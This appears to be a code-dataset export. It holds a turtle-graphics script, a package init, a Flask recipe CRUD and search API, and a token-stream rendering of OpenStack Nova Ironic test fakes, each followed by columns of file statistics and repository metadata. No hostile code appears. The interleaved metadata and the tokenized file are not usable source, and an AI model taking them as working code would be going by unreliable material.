_STEPS = [
    ("color", "black"),
    ("forward", 50), ("right", 90),
    ("forward", 50), ("right", 90),
    ("forward", 100), ("right", 90),
    ("forward", 100), ("right", 90),
    ("forward", 100), ("right", 90),
    ("forward", 50), ("right", 90),
    ("forward", 100),
    ("back", 50), ("right", 90),
    ("forward", 50),
    ("back", 100),
]

for method_name, argument in _STEPS:
    getattr(t, method_name)(argument)

t.done()
| 12.227273
| 18
| 0.69145
| 60
| 269
| 3.1
| 0.216667
| 0.344086
| 0.301075
| 0.33871
| 0.774194
| 0.774194
| 0.774194
| 0.774194
| 0.607527
| 0.607527
| 0
| 0.159184
| 0.089219
| 269
| 21
| 19
| 12.809524
| 0.6
| 0
| 0
| 0.75
| 0
| 0
| 0.018587
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
68714a78c03c6acc6cc92a2ce17558dc65f6e1a5
| 37
|
py
|
Python
|
ica/paraphraseator/datamodules/__init__.py
|
pedrorio/image_caption_augmentation
|
683ed90cecd4bc12f65dc238f1ff2dedbbc1b666
|
[
"MIT"
] | null | null | null |
ica/paraphraseator/datamodules/__init__.py
|
pedrorio/image_caption_augmentation
|
683ed90cecd4bc12f65dc238f1ff2dedbbc1b666
|
[
"MIT"
] | null | null | null |
ica/paraphraseator/datamodules/__init__.py
|
pedrorio/image_caption_augmentation
|
683ed90cecd4bc12f65dc238f1ff2dedbbc1b666
|
[
"MIT"
] | null | null | null |
from . import ImageCaptionsDataModule
| 37
| 37
| 0.891892
| 3
| 37
| 11
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 37
| 1
| 37
| 37
| 0.970588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6872df2376b5207237c982baf7647120ba8ba462
| 18,543
|
py
|
Python
|
app/v1/views/recipe_views.py
|
pndemo/yummy-recipes-api
|
ae6729bd1c886ce9872d83488a6eaa99e92be513
|
[
"MIT"
] | null | null | null |
app/v1/views/recipe_views.py
|
pndemo/yummy-recipes-api
|
ae6729bd1c886ce9872d83488a6eaa99e92be513
|
[
"MIT"
] | 3
|
2019-12-20T23:17:20.000Z
|
2022-03-21T22:16:25.000Z
|
app/v1/views/recipe_views.py
|
pndemo/yummy-recipes-api
|
ae6729bd1c886ce9872d83488a6eaa99e92be513
|
[
"MIT"
] | 1
|
2017-12-13T12:44:11.000Z
|
2017-12-13T12:44:11.000Z
|
""" Recipe view for creating, viewing, updating and deleting recipes """
from flask import jsonify, request, url_for
from flask_restful import Resource, reqparse
from sqlalchemy import exc
from app.v1.models.category_models import Category
from app.v1.models.recipe_models import Recipe
from app.v1.validators import data_validator
from app.v1.validators.recipe_validators import validate_recipe_name, validate_ingredients, \
validate_directions
from app.v1.utils.decorators import authenticate
from app.v1.utils.paginator import get_paginated_results
# pylint: disable=C0103
# pylint: disable=W0703
# pylint: disable=W0613
class RecipeView(Resource):
    """Allows for creation and listing of recipe categories."""
    # Every endpoint requires a valid access token; authenticate injects
    # (access_token, user) into each handler.
    method_decorators = [authenticate]

    # Shared body parser for POST; all fields are optional strings and are
    # validated explicitly by the validators below.
    parser = reqparse.RequestParser()
    parser.add_argument('recipe_name', type=str, help='Recipes\'s recipe name')
    parser.add_argument('ingredients', type=str, help='Recipes\'s ingredients')
    parser.add_argument('directions', type=str, help='Recipes\'s directions')

    def post(self, access_token, user, category_id):
        """
        Process POST request
        ---
        tags:
          - Recipe
        security:
          - Bearer: []
        parameters:
          - in: path
            name: category_id
            required: true
            description: The id of recipe category
            type: int
          - in: body
            name: body
            required: true
            description: Recipe's name, ingredients, directions and category_id
            type: string
            schema:
              properties:
                recipe_name:
                  type: string
                  default: Espresso Esiri
                ingredients:
                  type: string
                  default: 1) 1 tbsp plus 1 or 2 tsp (20-25 ml) Espresso, 2) 2 \
tbsp (30 ml) Benedictine, 3) Approx. 3 tbsp (40 ml) fresh heavy cream, 4) Unsweetened \
cocoa powder, 5) Ice cubes
                directions:
                  type: string
                  default: 1) Prepare the Espresso in a small cup. 2) Fill the mixing \
glass 3/4 full with ice cubes. Add the Benedictine and the Espresso. Cool, mixing the \
ingredients with the mixing spoon. 3) Pour into the glass, filtering the ice with a strainer. \
4) Shake the cream, which should be very cold, in the mini shaker until it becomes quite thick. \
5) Rest the cream on the surface of the cocktail, making it run down the back of the mixing spoon. \
6) Garnish with a light dusting of cocoa, and serve.
                category_id:
                  type: int
                  default: 1
        responses:
          201:
            description: A new recipe created successfully
          400:
            description: Data validation failed
          404:
            description: Invalid recipe category id
          500:
            description: Database could not be accessed
        """
        args = self.parser.parse_args()
        # Collect per-field validation messages; data_validator() decides
        # whether the request as a whole is acceptable.
        messages = {}
        messages['recipe_name_message'] = validate_recipe_name(args.recipe_name.strip(), category_id)
        messages['ingredients_message'] = validate_ingredients(args.ingredients)
        messages['directions_message'] = validate_directions(args.directions)
        if not data_validator(messages):
            return jsonify(messages), 400
        try:
            # Scope the category lookup to the authenticated user.
            category = Category.query.filter_by(id=category_id, user_id=user.id).first()
            if category:
                recipe = Recipe(recipe_name=args.recipe_name, ingredients=args.ingredients, \
                    directions=args.directions, category_id=category_id)
                recipe.save()
                response = jsonify({
                    'id': recipe.id,
                    'recipe_name': recipe.recipe_name,
                    'ingredients': recipe.ingredients,
                    'directions': recipe.directions,
                    'category_id': recipe.category_id,
                    'date_created': recipe.date_created,
                    'date_modified': recipe.date_modified
                })
                response.status_code = 201
            else:
                response = jsonify({'message': 'Sorry, recipe category could not be found.'})
                response.status_code = 404
        except exc.SQLAlchemyError as error:
            return jsonify({'message': str(error)}), 500
        return response

    def get(self, access_token, user, category_id):
        """
        Process GET request
        ---
        tags:
          - Recipe
        security:
          - Bearer: []
        parameters:
          - in: path
            name: category_id
            required: true
            description: The id of recipe(s) category
            type: int
          - in: query
            name: page
            description: Page number to display
          - in: query
            name: limit
            description: Number of recipes to display per page
        responses:
          200:
            description: Categories retrieved successfully
          400:
            description: Non-integer page and limit values submitted
          404:
            description: Invalid recipe category id
          500:
            description: Database could not be accessed
        """
        try:
            category = Category.query.filter_by(id=category_id, user_id=user.id).first()
            if category:
                recipes = Recipe.query.filter_by(category_id=category.id).all()
                # Paginator builds previous/next links off the base URL for
                # this endpoint; the trailing '?' lets it append query args.
                paginated = get_paginated_results(request, recipes, url_for('recipe_view', category_id=category_id) + '?')
                if paginated['is_good_query']:
                    results = []
                    for recipe in paginated['results']:
                        obj = {
                            'id': recipe.id,
                            'recipe_name': recipe.recipe_name,
                            'ingredients': recipe.ingredients,
                            'directions': recipe.directions,
                            'category_id': recipe.category_id,
                            'date_created': recipe.date_created,
                            'date_modified': recipe.date_modified
                        }
                        results.append(obj)
                    response = jsonify({
                        'category_name': category.category_name,
                        'results': results,
                        'previous_link': paginated['previous_link'],
                        'next_link': paginated['next_link'],
                        'page': paginated['page'],
                        'pages': paginated['pages']
                    })
                    response.status_code = 200
                else:
                    # Non-integer page/limit query values.
                    response = jsonify({'message': 'Please enter valid page and limit values.'})
                    response.status_code = 400
            else:
                response = jsonify({'message': 'Sorry, recipe category could not be found.'})
                response.status_code = 404
        except exc.SQLAlchemyError as error:
            return jsonify({'message': str(error)}), 500
        return response
class RecipeSpecificView(Resource):
    """Allows for viewing, updating and deletion of a specific recipe."""
    # All handlers require authentication; (access_token, user) are injected.
    method_decorators = [authenticate]

    # Shared body parser for PUT.
    parser = reqparse.RequestParser()
    parser.add_argument('recipe_name', type=str, help='Recipes\'s recipe name')
    parser.add_argument('ingredients', type=str, help='Recipes\'s ingredients')
    parser.add_argument('directions', type=str, help='Recipes\'s directions')

    def get(self, access_token, user, category_id, recipe_id):
        """
        Process GET request
        ---
        tags:
          - Recipe
        security:
          - Bearer: []
        parameters:
          - in: path
            name: category_id
            required: true
            description: The id of recipe category
            type: int
          - in: path
            name: recipe_id
            required: true
            description: The id of recipe requested
            type: int
        responses:
          200:
            description: Recipe retrieved successfully
          404:
            description: Category/recipe with id could not be found
          500:
            description: Database could not be accessed
        """
        try:
            # Two-step ownership check: category must belong to the user,
            # then the recipe must belong to that category.
            category = Category.query.filter_by(id=category_id, user_id=user.id).first()
            if category:
                recipe = Recipe.query.filter_by(id=recipe_id, category_id=category.id).first()
                if recipe:
                    response = jsonify({
                        'id': recipe.id,
                        'recipe_name': recipe.recipe_name,
                        'ingredients': recipe.ingredients,
                        'directions': recipe.directions,
                        'category_id': recipe.category_id,
                        'date_created': recipe.date_created,
                        'date_modified': recipe.date_modified
                    })
                    response.status_code = 200
                else:
                    response = jsonify({'message': 'Sorry, recipe could not be found.'})
                    response.status_code = 404
            else:
                response = jsonify({'message': 'Sorry, recipe category could not be found.'})
                response.status_code = 404
        except exc.SQLAlchemyError as error:
            return jsonify({'message': str(error)}), 500
        return response

    def put(self, access_token, user, category_id, recipe_id):
        """
        Process PUT request
        ---
        tags:
          - Recipe
        security:
          - Bearer: []
        parameters:
          - in: path
            name: category_id
            required: true
            description: The id of recipe category
            type: int
          - in: path
            name: recipe_id
            required: true
            description: The id of recipe requested
            type: int
          - in: body
            name: body
            required: true
            description: Recipe's name, ingredients and directions
            type: string
            schema:
              properties:
                recipe_name:
                  type: string
                  default: Apple Cinnamon White Cake
                ingredients:
                  type: string
                  default: 1) 1 teaspoon ground cinnamon 2) 2/3 cup white sugar \
3) 1/2 cup butter, softened 4) 2 eggs 5) 1 1/2 teaspoons vanilla extract 6) 1 1/2 \
cups all-purpose flour 7) 1 3/4 teaspoons baking powder 8) 1/2 cup milk 9) 1 apple, \
peeled and chopped
                directions:
                  type: string
                  default: 1) Prepare the Espresso in a small cup. 2) Fill the mixing \
glass 3/4 full with ice cubes. Add the Benedictine and the Espresso. Cool, mixing the \
ingredients with the mixing spoon. 3) Pour into the glass, filtering the ice with a strainer. \
4) Shake the cream, which should be very cold, in the mini shaker until it becomes quite thick. \
5) Rest the cream on the surface of the cocktail, making it run down the back of the mixing spoon. \
6) Garnish with a light dusting of cocoa, and serve.
        responses:
          200:
            description: Recipe updated successfully
          404:
            description: Category/recipe with id could not be found
          500:
            description: Database could not be accessed
        """
        args = self.parser.parse_args()
        messages = {}
        # recipe_id is passed so the name-uniqueness check excludes the
        # recipe being updated.
        messages['recipe_name_message'] = validate_recipe_name(args.recipe_name.strip(), \
            category_id=category_id, recipe_id=recipe_id)
        messages['ingredients_message'] = validate_ingredients(args.ingredients)
        messages['directions_message'] = validate_directions(args.directions)
        if not data_validator(messages):
            return jsonify(messages), 400
        try:
            category = Category.query.filter_by(id=category_id, user_id=user.id).first()
            if category:
                recipe = Recipe.query.filter_by(id=recipe_id, category_id=category.id).first()
                if recipe:
                    recipe.recipe_name = args.recipe_name
                    recipe.ingredients = args.ingredients
                    recipe.directions = args.directions
                    recipe.save()
                    response = jsonify({
                        'id': recipe.id,
                        'recipe_name': recipe.recipe_name,
                        'ingredients': recipe.ingredients,
                        'directions': recipe.directions,
                        'category_id': recipe.category_id,
                        'date_created': recipe.date_created,
                        'date_modified': recipe.date_modified
                    })
                    response.status_code = 200
                else:
                    response = jsonify({'message': 'Sorry, recipe could not be found.'})
                    response.status_code = 404
            else:
                response = jsonify({'message': 'Sorry, recipe category could not be found.'})
                response.status_code = 404
        except exc.SQLAlchemyError as error:
            return jsonify({'message': str(error)}), 500
        return response

    def delete(self, access_token, user, category_id, recipe_id):
        """
        Process DELETE request
        ---
        tags:
          - Recipe
        security:
          - Bearer: []
        parameters:
          - in: path
            name: category_id
            required: true
            description: The id of recipe category
            type: int
          - in: path
            name: recipe_id
            required: true
            description: The id of recipe requested
            type: int
        responses:
          200:
            description: Recipe updated successfully
          404:
            description: Category/recipe with id could not be found
          500:
            description: Database could not be accessed
        """
        try:
            category = Category.query.filter_by(id=category_id, user_id=user.id).first()
            if category:
                recipe = Recipe.query.filter_by(id=recipe_id, category_id=category.id).first()
                if recipe:
                    recipe.delete()
                    response = jsonify({'message': "Recipe {} has been deleted.". \
                        format(recipe.recipe_name)})
                    response.status_code = 200
                else:
                    response = jsonify({'message': 'Sorry, recipe could not be found.'})
                    response.status_code = 404
            else:
                response = jsonify({'message': 'Sorry, recipe category could not be found.'})
                response.status_code = 404
        except exc.SQLAlchemyError as error:
            return jsonify({'message': str(error)}), 500
        return response
class RecipeSearchView(Resource):
    """Allows for searching of a recipe."""
    method_decorators = [authenticate]

    def get(self, access_token, user, category_id):
        """
        Process GET request
        ---
        tags:
          - Recipe
        security:
          - Bearer: []
        parameters:
          - in: path
            name: category_id
            required: true
            description: The id of recipe category
            type: int
          - in: query
            name: q
            description: Recipe name to search
          - in: query
            name: start
            description: id to start category results pagination
          - in: query
            name: limit
            description: Number of recipes to display per page
        responses:
          200:
            description: Recipes retrieved successfully
          400:
            description: Non-integer page and limit values submitted
          404:
            description: Category with category id could not be found
          500:
            description: Database could not be accessed
        """
        # Missing/empty 'q' falls back to '' so the ilike pattern
        # '%%' matches every recipe in the category.
        if request.values.get('q'):
            q = request.values.get('q')
        else:
            q = ''
        try:
            category = Category.query.filter_by(id=category_id, user_id=user.id).first()
            if category:
                # Case-insensitive substring match on recipe name,
                # scoped to this category.
                recipes = Recipe.query.filter(Recipe.recipe_name.ilike('%' + q + \
                    '%')).filter_by(category_id=category_id).all()
                # Base URL keeps the search term so pagination links
                # re-run the same query.
                paginated = get_paginated_results(request, recipes, url_for('recipe_search_view', \
                    category_id=category_id) + '?q=' + q + '&')
                if paginated['is_good_query']:
                    results = []
                    for recipe in paginated['results']:
                        obj = {
                            'id': recipe.id,
                            'recipe_name': recipe.recipe_name,
                            'ingredients': recipe.ingredients,
                            'directions': recipe.directions,
                            'category_id': recipe.category_id,
                            'date_created': recipe.date_created,
                            'date_modified': recipe.date_modified
                        }
                        results.append(obj)
                    response = jsonify({
                        'results': results,
                        'previous_link': paginated['previous_link'],
                        'next_link': paginated['next_link'],
                        'page': paginated['page'],
                        'pages': paginated['pages']
                    })
                    response.status_code = 200
                else:
                    response = jsonify({'message': 'Please enter valid page and limit values.'})
                    response.status_code = 400
            else:
                response = jsonify({'message': 'Sorry, recipe category could not be found.'})
                response.status_code = 404
        except exc.SQLAlchemyError as error:
            return jsonify({'message': str(error)}), 500
        return response
# Flask-RESTful view callables for URL registration; the endpoint names
# must match the url_for() lookups used inside the views above.
recipe_view = RecipeView.as_view('recipe_view')
recipe_specific_view = RecipeSpecificView.as_view('recipe_specific_view')
recipe_search_view = RecipeSearchView.as_view('recipe_search_view')
| 39.791845
| 122
| 0.542091
| 1,855
| 18,543
| 5.302965
| 0.137466
| 0.052862
| 0.019315
| 0.019823
| 0.811223
| 0.802684
| 0.793026
| 0.784487
| 0.784182
| 0.760903
| 0
| 0.018881
| 0.377339
| 18,543
| 465
| 123
| 39.877419
| 0.833102
| 0.302648
| 0
| 0.797235
| 0
| 0
| 0.127178
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02765
| false
| 0
| 0.041475
| 0
| 0.170507
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6884c3d0ff2f955835d4344cc95691c310650822
| 9,772
|
py
|
Python
|
nova/tests/unit/scheduler/ironic_fakes.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/scheduler/ironic_fakes.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/scheduler/ironic_fakes.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright 2014 OpenStack Foundation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
string|'"""\nFake nodes for Ironic host manager tests.\n"""'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|COMPUTE_NODES
name|'COMPUTE_NODES'
op|'='
op|'['
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'1'
op|','
name|'local_gb'
op|'='
number|'10'
op|','
name|'memory_mb'
op|'='
number|'1024'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'vcpus_used'
op|'='
number|'0'
op|','
name|'local_gb_used'
op|'='
number|'0'
op|','
name|'memory_mb_used'
op|'='
number|'0'
op|','
nl|'\n'
name|'updated_at'
op|'='
name|'None'
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|host
name|'host'
op|'='
string|"'host1'"
op|','
nl|'\n'
name|'hypervisor_hostname'
op|'='
string|"'node1uuid'"
op|','
name|'host_ip'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'hypervisor_version'
op|'='
number|'1'
op|','
name|'hypervisor_type'
op|'='
string|"'ironic'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'10'
op|','
name|'free_ram_mb'
op|'='
number|'1024'
op|','
nl|'\n'
name|'cpu_allocation_ratio'
op|'='
number|'16.0'
op|','
name|'ram_allocation_ratio'
op|'='
number|'1.5'
op|','
nl|'\n'
DECL|variable|disk_allocation_ratio
name|'disk_allocation_ratio'
op|'='
number|'1.0'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'2'
op|','
name|'local_gb'
op|'='
number|'20'
op|','
name|'memory_mb'
op|'='
number|'2048'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'vcpus_used'
op|'='
number|'0'
op|','
name|'local_gb_used'
op|'='
number|'0'
op|','
name|'memory_mb_used'
op|'='
number|'0'
op|','
nl|'\n'
name|'updated_at'
op|'='
name|'None'
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|host
name|'host'
op|'='
string|"'host2'"
op|','
nl|'\n'
name|'hypervisor_hostname'
op|'='
string|"'node2uuid'"
op|','
name|'host_ip'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'hypervisor_version'
op|'='
number|'1'
op|','
name|'hypervisor_type'
op|'='
string|"'ironic'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'20'
op|','
name|'free_ram_mb'
op|'='
number|'2048'
op|','
nl|'\n'
name|'cpu_allocation_ratio'
op|'='
number|'16.0'
op|','
name|'ram_allocation_ratio'
op|'='
number|'1.5'
op|','
nl|'\n'
DECL|variable|disk_allocation_ratio
name|'disk_allocation_ratio'
op|'='
number|'1.0'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'3'
op|','
name|'local_gb'
op|'='
number|'30'
op|','
name|'memory_mb'
op|'='
number|'3072'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'vcpus_used'
op|'='
number|'0'
op|','
name|'local_gb_used'
op|'='
number|'0'
op|','
name|'memory_mb_used'
op|'='
number|'0'
op|','
nl|'\n'
name|'updated_at'
op|'='
name|'None'
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|host
name|'host'
op|'='
string|"'host3'"
op|','
nl|'\n'
name|'hypervisor_hostname'
op|'='
string|"'node3uuid'"
op|','
name|'host_ip'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'hypervisor_version'
op|'='
number|'1'
op|','
name|'hypervisor_type'
op|'='
string|"'ironic'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'30'
op|','
name|'free_ram_mb'
op|'='
number|'3072'
op|','
nl|'\n'
name|'cpu_allocation_ratio'
op|'='
number|'16.0'
op|','
name|'ram_allocation_ratio'
op|'='
number|'1.5'
op|','
nl|'\n'
DECL|variable|disk_allocation_ratio
name|'disk_allocation_ratio'
op|'='
number|'1.0'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'4'
op|','
name|'local_gb'
op|'='
number|'40'
op|','
name|'memory_mb'
op|'='
number|'4096'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'vcpus_used'
op|'='
number|'0'
op|','
name|'local_gb_used'
op|'='
number|'0'
op|','
name|'memory_mb_used'
op|'='
number|'0'
op|','
nl|'\n'
name|'updated_at'
op|'='
name|'None'
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|host
name|'host'
op|'='
string|"'host4'"
op|','
nl|'\n'
name|'hypervisor_hostname'
op|'='
string|"'node4uuid'"
op|','
name|'host_ip'
op|'='
string|"'127.0.0.1'"
op|','
nl|'\n'
name|'hypervisor_version'
op|'='
number|'1'
op|','
name|'hypervisor_type'
op|'='
string|"'ironic'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'40'
op|','
name|'free_ram_mb'
op|'='
number|'4096'
op|','
nl|'\n'
name|'cpu_allocation_ratio'
op|'='
number|'16.0'
op|','
name|'ram_allocation_ratio'
op|'='
number|'1.5'
op|','
nl|'\n'
DECL|variable|disk_allocation_ratio
name|'disk_allocation_ratio'
op|'='
number|'1.0'
op|')'
op|','
nl|'\n'
comment|'# Broken entry'
nl|'\n'
name|'objects'
op|'.'
name|'ComputeNode'
op|'('
nl|'\n'
name|'id'
op|'='
number|'5'
op|','
name|'local_gb'
op|'='
number|'50'
op|','
name|'memory_mb'
op|'='
number|'5120'
op|','
name|'vcpus'
op|'='
number|'1'
op|','
nl|'\n'
name|'host'
op|'='
string|"'fake'"
op|','
name|'cpu_info'
op|'='
string|"'baremetal cpu'"
op|','
nl|'\n'
DECL|variable|stats
name|'stats'
op|'='
name|'dict'
op|'('
name|'ironic_driver'
op|'='
nl|'\n'
string|'"nova.virt.ironic.driver.IronicDriver"'
op|','
nl|'\n'
DECL|variable|cpu_arch
name|'cpu_arch'
op|'='
string|"'i386'"
op|')'
op|','
nl|'\n'
DECL|variable|supported_hv_specs
name|'supported_hv_specs'
op|'='
op|'['
name|'objects'
op|'.'
name|'HVSpec'
op|'.'
name|'from_list'
op|'('
nl|'\n'
op|'['
string|'"i386"'
op|','
string|'"baremetal"'
op|','
string|'"baremetal"'
op|']'
op|')'
op|']'
op|','
nl|'\n'
name|'free_disk_gb'
op|'='
number|'50'
op|','
name|'free_ram_mb'
op|'='
number|'5120'
op|','
nl|'\n'
DECL|variable|hypervisor_hostname
name|'hypervisor_hostname'
op|'='
string|"'fake-hyp'"
op|')'
op|','
nl|'\n'
op|']'
newline|'\n'
nl|'\n'
DECL|variable|SERVICES
name|'SERVICES'
op|'='
op|'['
nl|'\n'
name|'objects'
op|'.'
name|'Service'
op|'('
name|'host'
op|'='
string|"'host1'"
op|','
name|'disabled'
op|'='
name|'False'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'Service'
op|'('
name|'host'
op|'='
string|"'host2'"
op|','
name|'disabled'
op|'='
name|'True'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'Service'
op|'('
name|'host'
op|'='
string|"'host3'"
op|','
name|'disabled'
op|'='
name|'False'
op|')'
op|','
nl|'\n'
name|'objects'
op|'.'
name|'Service'
op|'('
name|'host'
op|'='
string|"'host4'"
op|','
name|'disabled'
op|'='
name|'False'
op|')'
op|','
nl|'\n'
op|']'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|get_service_by_host
name|'def'
name|'get_service_by_host'
op|'('
name|'host'
op|')'
op|':'
newline|'\n'
indent|' '
name|'services'
op|'='
op|'['
name|'service'
name|'for'
name|'service'
name|'in'
name|'SERVICES'
name|'if'
name|'service'
op|'.'
name|'host'
op|'=='
name|'host'
op|']'
newline|'\n'
name|'return'
name|'services'
op|'['
number|'0'
op|']'
newline|'\n'
dedent|''
endmarker|''
end_unit
| 12.723958
| 88
| 0.611543
| 1,528
| 9,772
| 3.806937
| 0.107984
| 0.102114
| 0.065326
| 0.06034
| 0.828434
| 0.802304
| 0.740416
| 0.716349
| 0.692281
| 0.686608
| 0
| 0.021305
| 0.092202
| 9,772
| 767
| 89
| 12.740548
| 0.634427
| 0
| 0
| 0.94133
| 0
| 0
| 0.375768
| 0.028039
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.001304
| 0
| 0.001304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7bdd9b5f6f856c7ea2e4df64224e881ecb83b36
| 48,761
|
py
|
Python
|
sdk/storage/azure-storage-blob/tests/test_cpk_n.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/storage/azure-storage-blob/tests/test_cpk_n.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 17,773
|
